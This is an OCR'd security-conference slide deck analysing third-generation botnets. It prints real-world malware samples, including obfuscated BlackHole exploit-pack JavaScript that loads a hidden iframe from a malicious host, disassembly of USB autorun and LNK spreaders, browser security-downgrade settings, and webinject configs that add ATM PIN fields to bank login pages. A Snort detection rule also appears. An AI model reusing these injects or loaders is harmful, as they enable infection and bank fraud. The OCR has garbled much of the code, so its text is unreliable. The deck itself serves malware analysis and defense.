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About Us 



■ Aditya K Sood 

• PhD Candidate at Michigan State University 

- Working with iSEC Partners 

- Founder, SecNiche Security Labs 

- Worked previously for Armorize, Coseinc and KPMG 

- Active Speaker at Security conferences 

- Linkedln - http : //www. linkedin.com/in/adityaks 

- Website: http://www.secniche.org I Blog: http://secniche.blogspot.com 

- Twitter: @AdityaKSood 

■ Dr. Richard J Enbody 

• Associate Professor, CSE, Michigan State University 

- Since 1987, teaching computer architecture/ computer security / mathematics 

- Co- Author CS 1 Python book, The Practice of Computing using Python. 

- Patents Pending - Hardware Buffer Overflow Protection 
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Disclaimer 



■ This research relates to my own efforts and does not provide the 
view of any of my present and previous employers. 
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Rise of Third Generation Botnets (TGB) 
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TGB Infections started with Zeus 



Bot Spreading Mechanisms 
Widely Deployed 



Browser Exploit Packs 



■ Browser Exploit Packs (BEPs) 

— Overview 

• Automated frameworks containing browser exploits 

• Implements the concept of Drive-by-Download attacks 

• Exploits are bundled as unique modules 

• Mostly written in PHP + MySQL 

- PHP code is obfuscated with Ion Cube encoder 

• Successfully captures the statistics of infected machine 

• Widely used BEPs are - BlackHole / Nuclear / Phoenix etc. 



How is the exploit served? 

• Fingerprinting browser's environment 

- User- Agent string parameters 

- Plugin detection module - Java / PDF / Flash 

- Custom JavaScripts for extracting information from the infected machine ^ 
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Browser Exploit Packs 



Obfuscated JavaScripts used in BlackHole Infections 

• Hiding the infected domain 



<script>s= " " ; try < Q=daaument . crea teEIefcent { "p "} ; 
q . appe ndChi ld{"123"+n) j) 

catch { gw ) [7]h=- 1 6 / 7 ; t ry[{]a=pro tot ype ; [>]cat ch { z xc ) 

[7]e=windaw [ "e "+ "va "+"1" ) ;n="18 . 2? . 420 . 510 . 64 . 120 . 400 . 555 ,198,351,436. 
505 . 220 . 346 . 164 . 515 . 202 . 348 . 276 . 540 . 202 . 327 . 404 . 550 . 232 . 345 . 264 . 605 . 168 . 
78 . 234 . 444 . 500 . 242 . 117 . 164 . 455 . 96 . 279 . 164 . 615 .26.27.36.45. 210 . 306 . 456 . 485 . 
218 . 303 . 456 . 200 . 82 . 177 .52.45.18. 375 . 128 . 505 .216. 345 . 404 . 160 . 246 .39.36.45. 
18 . 300 . 444 . 495 . 234 . 327 . 404 . 550 . 232 . 138 . 476 . 570 . 210 . 348 . 404 . 200 . 68 . 180 . 420 . 
510 . 228 . 291 . 436 . 505 . 64 . 345 . 456 . 495 . 122 . 117 . 416 . 580 . 232 . 336 . 232 . 235 . 94 . 156 . 
216 . 280 . 98 . 165 . 216 . 245 . 104 . 168 . 204 . 245 . 104 . 165 . 212 . 260 . 98 . 159 . 216 . 230 . 230 . 
303 . 456 . 590 . 202 . 312 . 464 . 580 . 224 . 138 . 396 . 555 . 218 . 141 . 404 . 510 . 196 . 312 .468.560 
. 198 . 363. 472 . 505 . 100 .297 . 392 . 605 . 236 . 357 . 388 . 235 . 100 . 153. 392 . 275 . 112 . 297 
Redacted 

. ". split (" . if (vindov . document) 
for {1=6-2-1-2-1 ;-795+i[T]=2-2;i++) 

7]fc=i r -s=s+ String, fromCharCade {n[k] / (ij%](h*h] +2) ) ; 
^]e{s> ;[>>l</5cript> 







tuscate< 



>cript 



if (doc ument . get Element sEyTagName { 'body 1 ) [0])[{] 
iframerO ? 

E 

function if ramer £)[{] 

var f = document . createElement {' if rame ') ; 

f . setAttribute { 1 src" , ■ http: //4Gei7 614E31475415 6 . servehttp. com/efbliupcyve2cbywa/ 

23b7ecanyipva74/eswcwl4Slir . php?ewgewl74efwl7h6re Ih47rew65gdf slE 6r5h=lEe35 94f Qe2f ld35 1 ) ; 

f . style . visibility=' hidden' ; 

f . style .posi tion=" absolute 1 ; 

f . style . lef t=" 1 ;f. style . top=' 1 ; 

f. setAttribute { 'width' , ' 10 ' ) ;f. setAttribute ( ' height ' , ' 10 ' ) ; 

document . get Element sEyTagName { 'body ' ) [0] . appendChild {f ) ; , ^^L^^^ r \ / / 




9 



Browser Exploit Packs 



Plugin Detection Code 

— Scripts code taken from real world case studies 



try[[]l=b {c . Get Variable ( "? version "J J } catch (k) j}if(!l&&a} {l=a}) 



j . installed=l?l : -1 ;j . versian=g. f armatNum{l> ; return true ]- ]- 
adobe re ade r : [TJmime T ype : "appl i ca t i on/pdf " f na vPl Lzgi nGhj : rmll f proglf? : 

[ "AcroPDF. PDF", "PDF. PdfCtrl "J f 

classID: " clsid ; CA8A9 780-28 OD-1 1 CF-A2 4D- 4 4 45535 40000", INS TALLED : f ) f 
pluginHasMimeType : function {d, c, f)[TJvar b=this P e=b.[l], a;f or {a in d> 
pHif {d[a][p 
[Tjreturn l| 



J 



d[a] ■ typei~&|d[a] . type^=c) [Tjreturn 1 } } if {e . getMiir.eEnabledPlugin{c P f ) ) 
return o[> 



Redacted 



<script>if (|T| ( 1 \v 1 = 1 v 1 ) ) [{Jvar nunu=ll /var dnkzaS=this [ 1 eval 1 ] ;[}] 
var chert=dnkza-3 {document . getEleir.entsEyTagName { 1 * s > [nunu] . value ) ; 
this[' ■ + »»+ 1 '+ J e '+ J v J + J al J + 1 J + 1 J J (chert) ;for (erepdvi = bocvg^S; 
erepdwi > 0; erepdwi — >[T]far {iwcwco7 = bacwgze-erepdwi; 
i wcwca 7 <= hz xz j 3 . 1 ength r - i wcwca 7=i wcwca 7 +bo cwgz S } 
[{]cuxox=cuxc x- hz xz j 3 . charAt {i wcwco 7) ; } } 

var boavcvg^cuxox+ rr ~=~pi uginZtetect . get Version { J Adobef?eader J ; . split ( 1 . 1 ) ; 

var- s v=par s e I n t {inp[0] +inp[l] +inp [2] ) ;if~ {sv<800)[T]addp{ 1 esgtgnktilct2 .pdf 1 ) ; 
>>lcatch{e)[{T> 



DETECTPDF { > ; 

f unc t i o n-mo t he r f ucke r { ) [TTJmo t he r f ucke r { > ; " ; 
var waiwai=apdthvb7 { 1 ' + " "+ 1 J +boa vcvg+ 1 1 ) ; 
eval ( 1 / *hui */ 1 +waiwai+ 1 /*hui*/ 1 ) ;</script> 



PDF Plugin Detection 



10 



Demonstration 



Drive-by-Download Attacks 



Drive-by-Download 

• Victim's browser is forced to visit infected website 

• IFrame redirects browser to the BEP 

• Exploit is served by fingerprinting the browser environment 

• Browser is exploited successfully using JavaScript Heap Spraying 

• BEP silently downloads the malware onto the victim machine 



Drive-by-Download Frameworks 



Drive-by-Download Frameworks 

— Java Drive-by Generator 



Java 

Drive-by Generator 



Welcome AoVmnistr-afcor 



Choose Met bod: 




Template Options-; 




O HTML Based Drive-By 




"1 done Weosite (Soon ! ]l 




*T |^AR Based Duve -6y| 






~i im 






Select Template: 


[| Other Option* 




n 



Drop Options 

Drop Name: 
[qtrwH2pfkexe 
Drop Location: 
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General Options 

Program URL: 



http 



171 Admin Control Panel: 
hht p://v^ww-site. corn/ index, php 



Advanced Options: 

M Hlf^ Encryf*iori: (BETA) 
Level ] 
IT" Level ? 
f* Level 3 
l"" Level -i 



Redirect Options; 

I I Activate Reclrect 
Pun Redrect: 



Gam! Pje fc edr; 

|h«pV;/ 



Generate Now 1 



i 



About 



Ex* 



AI»bne+ii Dev -Paint.CcMTi | 201! 




Custom Publisher: 

Publisher Name: 
|h^>ei2h9e 

Og aniMJtlcn Mama: 
|xwzf 3bo4H 

OganiMftton unit: 

loyeJhU Q p v m 

«y: 

]mrn5nQx4ym 

*yia5 
Country: 
l-an+wtHpzq 



Project N<*nie: 



wgpu-Hvwvf 








■<* I 
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Demonstration 



Spreaders 



USB Spreading (Upas Bot - Case Study) 

— Inside USB Spreader 

- Widely used technique in bot design for infecting USB devices 

— Win 32 Implementation 

• Bot calls RegisterDeviceNotificationW function 

» It can also be implemented as a windows service 



push 

nou 

sub 

and 

push 

push 

pop 

xor 

lea 



push 

push 

call 

push 

lea 

push 

push 

nog 

no u 

call 



ebp 

ebp, esp 
esp, 20h 

[ebp+Notif icationFilter ] f 
edi 
7 

ecx 

eax, eax 

edi, [ebp+uar_1C] 
rep stosd 

lea eax, [ebp+pclsid] 

eax ; pclsid * 

offset sz ; "{aBdcbf 1 0-6530-11d2-901f-00c04f b951ed} 

ds iCLSIDfromString 
; flags 

eax , [ebp+Notif icationf ilter ] 
eax ; Notif icationf ilter 

[ebp+hRecipient] ; hRecipient 
[ebp+uar_1C] , S 
[ebp+Notif icationf ilter] f 20h 
ds :RegisterDeuiceNotif icationW 




GUID for Raw USB 
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Spreaders 



■ USB Spreading (Upas Bot - Case Study) 

— Plug and Play (PnP) Devices have unique set of different GUIDs 

- Device interface GUID 

» Required for dbcc_classguid DEV_BROADCAST_DEVICEINTERFACE 

- Device class GUID 

» Defines wide range of devices 

• Defines WindowProc as follows 

» WM_DEVICECHANGE notification message in DEV_BROADCAST_HDR 
» dbch_devicetype -» DBT_DEVTYP_DEVICEINTERFACE 

• Wait for the USB device and triggers device-change event as follows: 

- wParam in WindowProc 

» DBT_DEVICEARRIVAL I DBT_DEVICEREMOVALCOMPLETE 

- Fetches drive letter of the USB devices as follows 

» dbcvjinitmask in _DEV_BROADCAST_VOLUME I Logical drive information 



• Continued 
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Spreaders 



■ USB Spreading (Upas Bot - Case Study) 

— On successful detecting the USB, bot execute function as follows; 

- CopyFileW to copy malicious executable in the USB drive 

- CreateFileW to create autorun.inf file in the USB root directory 

- SetFileAttributesW to apply required files attribute 



push 

lea 

push 

push 

push 

push 

call 

add 

xor 

push 

lea 

push 

push 

call 

push 

lea 

push 

call 



"%ws%ws a.exe" 



[ebp+arg_4] 
eax , [ebp+FileNane] 
[ebp+arg_0] 
offset aWsWsaexe : 
ebx 
eax 

sub_4Q291B 
esp, 1Uh 
ebx, ebx 

ebx ; bfaillf Exists 

eax , [ebp+f ileName] 

eax ; lpNewFileName 

edi ; IpExistingf ileName 

esi ; CopyfileW 

6 ; dwFileAttributes 

eax , [ebp+f ileName] 
eax ; lpFileName 

ds:Setf ileflttributesW 



Autorun.inf infection 




push offset aUsautoruninf 

lea eax, [ebp+uar_98G] 

push esi 

push eax 

call sub_4Q291B 

push [ebp+arg_U] 

lea eax, [ebp+Buffer] 

push offset aAutorunOpent/s 

push 1G4h 

push eax 

call sub_i*028EC 

add esp, 2Gh 

push ebx 

push 80h 

push 2 

push ebx 

push ebx 

push GCGGGGGQOh 

lea eax, [ebp+uar_98G] 

push eax ; lpFileName 

call ds : CreateFileW 



"%wsautorun .inf ' 



'[autorun]\r\nopen=%ws_a .exe\r\n" 



hTemplateFile 
dwFlags And Attributes 
dwCreationDisposition 
IpSecurity Attributes 
dwShareMode 
dwDesiredAccess 
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Spreaders 



USB Spreading (Upas Bot - Case Study) 

— Infecting USB devices using Malicious .LNK file infection 



.LNK infection 



push 

push 

push 

call 

lea 

push 

push 

lea 

push 

push 

push 

call 

push 

lea 

push 

lea 

push 

call 

add 

lea 

push 

call 



offs 

esi 

eax 

sub_ 

eax , 

eax 

[ebp 

eax , 

offs 

esi 

eax 

sub 

[ebp 

eax , 

eax 

eax , 

eax 

sub_ 

esp, 

eax , 

eax 

ds:G 



et aWsWs ; ,, %ws%ws" 
40291B 

[ebp+f indf ileData _cF ileName] 

+arg_0] 

[ebp+uar_B8C] 
et aWsWs_lnk ; "%ws%ws .Ink" 



40291B 
+arg_4] 
[ebp+uar_774] 

[ebp+uar_B8C] 

[ebp+uar_774] 

; lpfileName 
etf ileflttributesW 



HNLU I 








loc_ii0iiBfl6: 


lea 




eax , [ebp+FindFileData .cFileName] 


push 


[ebp+argO] 


push 




offset alnk ; ".Ink" 


lea 


eax, [ebp+uar_980] 


push 




eax ; wchart * 


push 


offset aUs_1 ; "%ws*" 


call 




wcsstr 


push 


esi 


pop 




ecx 


push 


eax 


pop 




ecx 


call 


sub_40291B 


test 




eax, eax 


add 


esp, 1Bh 


jnz 




loc 404D27 


lea 


eax, [ebp+FindFileData] 








push 


eax ; lpFindFileData 






lea 


eax, [ebp+uar_980] 






/// 


push 


eax ; lpFileName 






call 


ds :FindFirstFileU 









push [ebp+arg_8] 

mou esi, [ebp+arg_4] 

push esi 

push offset aCStartWsStartU 

lea eax, [ebp+uar_214] 

push 209h 

push eax 

call sub_U0291B 

add esp, 14h 

push 1000h ; uFlags 

push ebx ; cbFilelnfo 

lea eax, [ebp+psfi] 

push eax ; psfi 

push edi ; dwFileAttributes 

push esi ; pszPath 

call dsiSHGetFilelnfoW 



/C start \"\" V'iwsUV && start \"\" \"%ws l.e' 
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Spreaders 



■ USB Spreading (Upas Bot - Case Study) 

Upas _ ]jp as in action 




push 

push 

lea 

push 

push 

call 

lea 

push 

push 

call 

push 

push 

lea 

push 

push 

call 

push 

push 

lea 

push 



edi 
offs 
eax , 
9 

eax 

sub_ 

eax , 

offs 

eax 

sub 

edi 

offs 

eax , 

1B3h 

eax 

sub 

offs 

offs 

eax , 

1Dh 



et aC ; "%c:\\" 

[ebp+uar_C] 



40291B 

[ebp+uar_C] 
et UalueName 

ii0i|fl97 



et aDataUsblnfecte ; "data=USB< | >Inf ected Drive %c :\\< | | >\r\n" 
[ebp+uar_130] 



4028EC 

et a1 ; "1.0. 0.0" 

et a?actSpreadingU ; "?act=spreading&uer=%s" 
[ebp+uar_2C] 



InFected Drive E:\\ 
InFected Drive H:\\ 
InFected Drive F:;\\ 
Infected Drive H:\\ 
Infected Drive 
Infected Drive H :\\ 
InFected Drive F:\\ 
Infected Drive G:\\ 
InFected Drive F:\\ 
InFected Drive F:\\ 
Infected Drive H:\\ 
InFected Drive F:\\ 
InFected DriveJsW 
InFected Drive F:\\ 



19 



Spreaders 

■ Upas Bot Network Behavior Detection 

— Writing signature specific to USB infection 



alert tcp @HOME_NET any -> @EXTERUAL_NET @HTTP_PORTS 
{ 

msg: "Win32. UPas - Runtime Detection"; 
flow: to_server, established; 
content : "POST "; 
depth: 5 ; 

uri content : "?act=spreading&ver=" ; 
no case ; 

content :"\0D OA OD 0A\data=USB\3C 7C 3E\ Infected Drive"; 
no case ; 

classtype : Worm; ref erence : SNS ; 
sid: 110034567; 
rev : 1 ; 




POST Exploitation 
Subverting System Integrity 



Understanding Ruskill 



What is Ruskill ? 



— A termed coined in Russia 

• It refers to the group of warriors who demonstrate their skill in the battle 

• Typically used by Diablo game players to demonstrate their strength and power 

— How does Ruskill relate to bots? 

• Ruskill module is used to demonstrate the capability of bots 

• Removing traces of malware in the system after successful reboot 
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Understanding Ruskill 

■ Inside Ruskill Module 

— Found in NGR (Dorkbot) 

— Remote file downloading and execution 

• Ruskill allows the bot to fetch any executable from third-party resource and 
execute it in the compromised system 

— Restoring System 

• Ruskill monitors all the changes performed by the malicious executable in the 
system 

• Ruskill restores the registry, files ad network settings to the same state ( before 
the execution of malicious binary) after reboot 

• Deletes the malicious executable after successful execution in the system 
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Understanding Ruskill 



Inside Ruskill Module 



loc UODBiil : 

mou edx, off_415784 

push esi ; arglist 

push offset aRuskillDetecte ; "[Ruskill] 

push edx ; int 

push offset dword_44AD98 ; int 

call sub_ii0BA00 

add esp, 18h 

jmp loc_U0DC82 

nou 
push 

push 

| push 
push 
call 
I add 
jmp 



Detected file: VfeV 11 



eax, off_ii1578ii 

esi ; arglist 

offset aRuskillDetec_B ; "[Ruskill]: Detected DNS: \"%sV 
eax ; int 

offset dword_44AD98 ; int 
sub 

esp, 1Bh 
loc U0DC82 



Ruskill Detecting File, DNS 
and Registry modifications 




nou ecx, off_415784 

push esi ; arglist 

push offset aRuskillDetec_1 ; "[Ruskill]: Detected Reg: V%sV" 

push ecx ; int 

push offset dword_44AD98 ; int 

call sub_40BA0B 

add esp, 10h 

imp loc 40DC82 
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Demonstration 



Critical Problem - DNS Changer 



DNSChanger apocalypse: 



DNSChanger cutoff is more whimper than 
bang. Score one for the good guys. 

Cutting off Internet access to computers infected with the nasty DNSChanger trojan did not bring 
about doomsday after all. Why, beyond the obvious, that's good news in the cybersecurity world. 

DNSChanger Doomsday 

The FBI is pulling the plug on rogue DNS ser/ers on Monday, meaning those who haven't cleaned up 
their computers could be stranded without Internet. Which begs the question, should they even be 
allowed Internet access? 



Don't forget: DNSChanger malware 
could kill your internet on Monday 

Facebook warns users of the end of the Internet via 
DNSChanger 



Internet blackout looms for 300K DNSChanger- 
infected computers 



FBI Limits DNSChanger Malware Damage; 
No 'Internet Doomsday' 



The FBI shut down servers that allowed more than 4 million 

DNSChanger Shutdown, Despite Laggards, Is a vims -infected computers to access internet 
Good Thing 

DNSChanger operation shuts down, leaving some 

without access to web ^ 
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DNS Changer in Action 

DNS Changer 

— Exploiting the DNS resolution functionality of the infected machine 

— What it works for? 

• Blocking security providers websites (Implementing blacklists) 

- Blocking microsoft.com updates website to restrict the downloading of updates 

- Restricting the opening of anti-virus vendors websites 

• Redirecting the browser to the malicious domain 

- Forcing the infected machine to download updates from malicious domain 

- Triggering chain infection for downloading another set of malware onto the 
infected system 



DNS Changer in Action 



■ DNS Changer 



v this works? 

Replacing the DNS server entries in the infected machine with IP addresses of 
the malicious DNS server 

Adding rogue entries in the hosts configuration file 

Executing DNS amplification attack by subverting the integrity of LAN 
devices such as routers and gateways 

- It results in DNS hijacking at a large scale in the network 
Hooking DNS libraries 

- The preferred method is Inline hooking in which detour and trampoline functions 
are created to play with DNS specific DLLs. 
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DNS Changer in Action 

DNS Changer 

— Inside DNS hooking 

• Hooking DNS API 

- Hooking DNSQuery (*) function calls in dnsapi.lib/dnsapi.dll 

- Implemented by creating a blacklist 

- Bot hijacks the DNS resolution flow by filtering all the incoming DNS requests 

• Hooking DNS Cache Resolver Service 

- Cache resolver service is used for DNS caching 

- Bot hooks sendto function in ws2_32.dll to verify the origin of DNS query to 
validate if sendto function is called by dnsrsslvr.dll 



DNS Changer in Action 



DNS Changer 

— Implementation in NGR bot 



noo 

push 

push 

push 

push 

call 

call 

nog 

nog 

nog 

push 

nog 

push 

push 

push 

push 

call 

add 

pop 



eax , [esi+edi*4+4] 
ecx , [esi+edi*4+8] 
eax ; char 

offset aS_0 ; "%s" 
offset aBdns ; "bdns" 
ecx ; IpString 

sub_ii07500 
sub_40A970 
edx , [esi+edi*4+8] 
[esi+edi*U+U] 
[ebp+lpString2] 



loc_iiOE7 03: 

nog ecx, [ebp+gar_4] 

nog edx, off_415770 

push ecx 

push eax ; arglist 

push offset aDnsBlockedDDon ; "[DNS] 

push edx ; int 

push offset dword_44AD98 ; int 

call sub UOBflOO 

add esp, 14h 



Blocked %d donain(s) - Redirecte". 




eax , 
ecx , 
edx 
edx , 
eax 



[ebp+arg_0] 

; arglist 
offset aDnsRedirecting ; 
ecx ; int 

edx ; int 

sub_40BA00 
esp, 24h 
edi 



sub_40A97O proc near 
push 
push 
call 
push 
call 
test 
jnz 



offset aDnsf lushresolg ; "Dnsf lushResolgerCache" 
offset aDnsapi dll ; "dnsapi .dll" 
sub_40392O 
eax 

sub_40375O 
eax, eax 

short loc 4GA98A 



[DNS]: Redirecting \"%s\" to \"%s\— 
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Demonstration 



Certificate Deletion 



Certificate Deletion 

— Removing all instances of private certificates from the infected machine 



NL4 



sub_4141F4 proc near 



push 


ebx 


push 


edi 


push 


offset szSubsystemProtocol 


push 


; hProu 


xor 


hi, hi 


call 


ds :CertOpenSystemStoreW 


mou 


edi, eax 


test 


edi, edi 




short loc 41423F 



'MY" 



h n ui I 


push 


ebp I 


mou 


ebp , ds :CertEnumCertif icatesInStore 


push 


esi 


push 





jmp 


short loc 41422A 



loc_414217: ; pCertContext 

push esi 

call ds :CertDuplicateCertif icateContext 

test eax, eax 

jz short loc_414229 



HNUJ 


loc 41422ft: 


push 


edi 


call 


ebp 


mou 


esi, eax 


test 


esi, esi 


jnz 


short loc i*14217f 




eax ; pCertContext 

ds :CertDeleteCertif icatef romStorel 



hnua 


push 


eax ; 


dwFlags 


push 


edi ; 


hCertStore 


mou 


hi, 1 




call 


ds:CertCloseStore 




pop 


esi 




pop 


ebp 





~T7 




ICE IX bot - certificate 
deletion module 
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Crypto virology in Action 



Cryptovirology 

— Exploiting the Built-in Windows Crypto APIs 

— Cryptovirology allows malware authors to build robust malware 

— How Cryptovirology is used in designing bots? 

• Generating random filenames for bots 

• Creating registry entries with random keys 

• Highly used for generating random DNS server entries 

- All DNS entries maps to the same IP address 

• Of course, encrypted communication between infected machine and C&C 
server 

• Verifying the integrity of malicious files downloaded in the system 

- Scrutinizing the bots 




Crypto virology in Action 



Cryptovirology 

— An instance from ICE IX bot - Windows Crypto API misuse 



push 

push 

push 

xor 

push 

push 

lea 

push 

mou 

call 



ebx 

0FO000040N 

1 

ebx 



dwFlags 
dwProuType 



ebx 
ebx 
ebx 
eax 
eax 

[ebp+uar_1], bl 

ds :CryptHcquireContextM 



[ebp+hProu] 



pszProuider 
pszContainer 

phProu 



NL4 



lea 

push 

push 

push 

push 

push 

call 



eax, [ebp+hHash] 

eax 

ebx 

ebx 

8003h 

[ebp+hProu] 



phHash 

dwFlags 

hKey 

Algid 

hProu 



HHui 



push ebx ; duFlags 

lea eax, [ebp+pduDataLen] 

push eax ; pduDataLen 

push [ebp+argO] ; pbData 

push 2 ; duParam 

push [ebp+hHash] ; hHash 

call ds :CryptGetHashParam 

cnp eax, 1 

jnz short loc_4083B6 



ds :CryptCreateHash ; Initiate the hashing oF a stream oF datal 



HHui 



push ebx ; 

push [ebp+duDataLen] ; 

mou [ebp+pduDataLen] , 

push [ebp+pbData] ; 

push [ebp+hHash] ; 

call ds :CryptHashData ; 



duFlags 

duDataLen 

10h 

pbData 
hHash 

Compute the cryptographic hash on a stream oF data 



HNUL 



IIH N 14 



cmp [ebp+pdwDataLen] , 10h| 
jnz short loc_4083B6 




loc_4083B6: ; hHash 

push [ebp+hHash] 
call ds :CryptDestroyHash 
III! i/ / 



mou 



[ebp+uar_1], al 
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Exploiting Browsers 
Data Exfiltration Over HTTP 



Z7 
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Downgrading Browser Security 



■ Removing Protections 

— Nullifying browser client side security to perform stealthy operations 

— Internet Explorer 

• Tampering zone values in the registry 

- \Software\Microsoft\Windows\CurrentVersionXInternet SettingsXZones 

— Firefox 

• Manipulating entries in user.js file 

- user _pref( ' 'security. warn_submit_insecure ' 'Jalse ); 

» Browser does not raise an alert box when information in sent over HTTP while 
submitting forms. 

- user _pref ("security. warn _viewing_mixed" Jalse); 

» Remove the warning of supporting mixed content over SSL. 



OLD School trick but works very effectively. Several other techniques 
of subverting the browser security also exists. 
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Man-in-the-Browser (MitB) 



Inside MitB 

— MitB typically refers to a userland rootkit that exploits the browser 
integrity 



User opens web page for initiating session 
and making online transactions 



Web page data in the form of HTTP request 
is hooked by MITB agent 




Tampered Web Page 



Altered POST data is sent back to server for 
performing the final operation 



Web Server 
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What Lies Beneath? 



£3 ChbsE Online- - My Accounts - Windows InlernBl Explorer 



el' 



CHASE Cp 



A ni 



JO!€d 



CH ABE O 



[n order to provide y^u v,rJ eytra tecu-ity, we oeeasiofially need so isk Ecf addfetwal 

inf^rmflCiqn: when ypg «CM3 your Accents online. 

*:e&sc enter the infcnnation belcvy to continue, 

r 



Serial Security rtumbcr: | 
drivers Uctnse: 
Date of Birth: 
ATM Card Number: 
Card Expiration Date: «[ 
PiN Ccits 



■r 



2< r 20l2 



gi Pnrtt 
A£l Dunts 



f mm- 



PiH Coif c {ocaifirrn): 



CONTINUE 



Ac dount 



Av aila b le B ala nc e H ftr a s e nt 6 




PlOrrl^: 
pi ton* 



lance E 



MV Checking (...1234) 



57.. 526. 31 



$6,207.31 



^ 300% 



CHA5E O 



Security Center Home > Online Fraud 



Types of Online Fraud 



► Fhishing 

► Fraudulent E-mails 
►Fraudulent E-mail Examples 



►Virus or Malware Attacks 



► Spam Scams 
►Internet Auctions 



Note: The Pop up is triggered in user's 
active session. So what it is actually? 

No doubt it is a Popup, but the 
technique is termed as Web Injects not 
phishing or something like that. 



^ W 
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Web Injects 



■ Web Injects 

— Based on the concept of hooking specific functions in the browser DLLs 

— On the fly infection tactic 

— Execution flow 

• Bot injects malicious content in the incoming HTTP responses 

• Injections are based on the static file named as webinjects.txt 

• Rules are statically defined by the botmaster 

• Bot fetches rules from the webinjects.txt file and injects in the live webpages 

— Information stealing in a forceful manner 

• Exploits user ignorance 



set_url htcps : //engine. paymentgace. ru/bpeserv let/BPC/ index, jsp" GP 
dnta_bt£oc« 

<td>< input cia33="cext" cype="cext" naine= "user let" vaiue=""></td> 
data_eacJ 

cfata_ inject 

<td c lass- "me t chant Loo in" > iaa£etl</td> 

data_ind \ /~~7 




39 



Web Injects 



= Grg&bifig Account Type 

set^url ri«ps;//oflLlrtetast*.l)aflk6fafl4rica.tO'Tii/*/<]<5tfliWtl':c-I GPH 
data_fte-fcire \ ) 

*diw c la s s » " pr ima ry Na vCrct * > 
datn_end 

■ What is meant by GPH flags? 

— Exploitation and infection metrics 

• G - injection will be made only for the resources that are requested by the GET 

• P - injection will be made only for the resources that are requested by the 
POST 

• L - is a flag for grabbing content between the tags datajbefore and data_after 

inclusive 

• H - similar as L except the ripped content is not included and the contents of 
tags datajbefore and data_after 
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Web Injects - Real Time Cases (1) 



set_url https : //web . da- us . citibank . coin/ cgi-bin/ citif i/portal/1/ 1 . do GP 
data_bef are 

s rc= " / cm/ j s /branding . j s " X / s c r ip t > 

data_end 

data_inject 

<SCRIPT> 

function set_caokiel (naine f value f expires) 
{ 

if (] expires) { expires = new Date();> 

document . cookie = name 4- rr=IT + escape (value) + rr ; expires= rr + expires . toGMTString ( ) + Fr ; pat r.=/ n ; 
> 

functi on ge t_co o ki e ( name } -[ 

cookie_name = name + rr = rr ; cookie_length = document . cookie . length; cookie_begin = 0; 

while (cookie_begin < cookie_length) 

{ 

value_begin = cookie_begin + cookie_name . length; 

i f ( docume nt . co o ki e . s ubs t r i ng ( co o ki e_be gi n f val ue_be gin) == co o ki e_nair.e j 
{ 

var value_end = document . cookie . indexOf ( n ; rr f value_begin) ; 
if (value_end == -1) -[ value_end = cookie_length; > 

return une s cape ( do cume n t . co o ki e . s ubs t r i ng ( val ue_be gi n f val ue_e nd ) } ; 
> 

cookie_begin = document . cookie . indexOf ( M " f cookie_begin) + 1; 
if (cookie_begin ==0) { break;} 
> 

return null; } 

</SCRIPT> 
data_end 
data_af ter 
<ncscript> 
data end 



Forceful Cookie Injection in 
Citibank's website to 
manipulate the user's session 
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Web Injects - Real Time Cases (2) 



s e t_url *banko f ame r i ca . com* GP 
data_bef ore 

<a href="#sitekey" title =FT View your SiteKey"> 

<img src^sas-dQcs/images/clr. gif" height= FT l rT width="10" border= rr O rr alt="View your SiteKey rT x/a> 
data_end 
data_inject 
</TD> 
</TR> 
<IR> 

<TD align=left cl as s =t e xtbo 1 d valign=top> 

< label for= rr passcode rr > <5FAN class =rT text2 ">* ATM Number : </SPAN> 
<span cl as s= "1\2 - ada " > <br> 

Enter an ATM Number . Your ATM Number must be 16 digits. 

</spanX/label> 
</TD> 
</TR> 
<TR> 
<TD> 

< input type= "pas sword* nanae= " ATMNR " i d= " ATMNR * class= rr textl rr value=" 11 maxlength= ri 16 ri size= ri 2 E "> 
data_end 
data_af ter 
data end 



Injecting HTML content in Bank of 
America's webpages to steal the 
ATM number and the Pass code. 



s e t_ur 1 ht tps : / / c nl i ne . we 1 1 s far go . com/ s i gno n * GP 
data_bef ere 

<input type= ri password rr name= fr password rr *</td> 

data_end 

data_inject 

<td width= rr 225 r, Xlabel f ar= rr password rr class= r, f ormlabel n >3 . ATM PIN< / 1 abe 1 Xbr / > 
<input type= rr password rT name = rr U5p a s s rr id= fr atmpin rT size= rr 2 rr ma >: 1 e n g t h = " 1 4 " 
t i 1 1 e = r 1 H! r. t e r .-.Il-I FIM" "ab^r.dex=" 1 1 t? accesskey= rr A ri 7> 
<br/>£nbsp; </td> 
data_end 
data_af ter 
data_end 

</label> 
data end 



Injecting HTML content in Wells 
Fargo bank to steal user's ATM 
code. 
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Form Grabbing 



Form Grabbing 

— It is an advanced technique of capturing information present in forms 




Web Server managed by 
Bank Domain 



User fills the Form with 
Username/ Password, 
The Form is submitted 
for verification 



MEMBER IOG1N 









Browser sends the login 
credentials to Web 
Server controlled by 
Bank Domain 



Bank serves login page for 
account access 



Bot hooks the browser 
and read the POST 
request 



Sood, En body 



ii 

x 



Malicious Bot 

residing in 
Victim Machine 



Bot releases the hook 
after sending 
information 

6 



Bot extracts the information 
i.e. complete POST request 
and send it to C&C server 




Attacker's Command 
& Control (C&C) 
Server 
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Form Grabbing 



Why Form Grabbing ? 

— Keylogging produces plethora of data 

— Form grabbing - extracting data from the GET/POST requests 

— Based on the concept of hooking and DLL injection 

— No real protection against malware 

E+ TRADE 

SECURE LOG ON; 
I I 



Banfctrf America Q 1 1 



OnPlltf linking 



Eiiv- Secure, free. 

I ntBF Utnlm-c 1 L>: 

I I 



iTH-r ATH *ir Chock Card 
Hunib«T: 



Vuur I- 1 1 N : 

i I 



|~~ Ihlp: Onlln* |0 

Act cunt In-: 



"3 



'Achdr-i- I ir^irmy?ii|{Q<t? 



F+rpat m n**d Wp. pnih your [L>7 



U»rID 

I 

i : .i « H 



r 



Ta prov^nl 'roue* «-n!ar i_> r zradiL 
Vto ATN iir Chock iZanJ hiniAtr 



Yc-nr P"[hqi T * mjidko rump-: 



I.! 1 1 li 



p n<ifMrfnTm r ir 




Form Grabbing 



Harvested data from POST 
requests. Kasper sky's anti virus 
license key entered by the user 



Harvested Data 



View report (HTTPS request, 205 bytes) 



CLOUD2 7D126CF46522DF69 

ice9 

1.2.0 

Server 2008 R2 x64 3 SP 1 
1033 

07 032012 11:05:33 

+0:00 

648:59:02 

07.03.2012 11:05:39 



Bot ID: 
Botnet: 
Version: 
OS Version: 
OS Language: 
Local time: 
GMT: 

Session time: 
Report time : 
Country: 

Comment for bot: - 
In the list of used: No 

Process name: C:\Prograni Files (x86)\Kaspersky L ab'vKaspersky Small Office S ecurity '-.avp .exe 
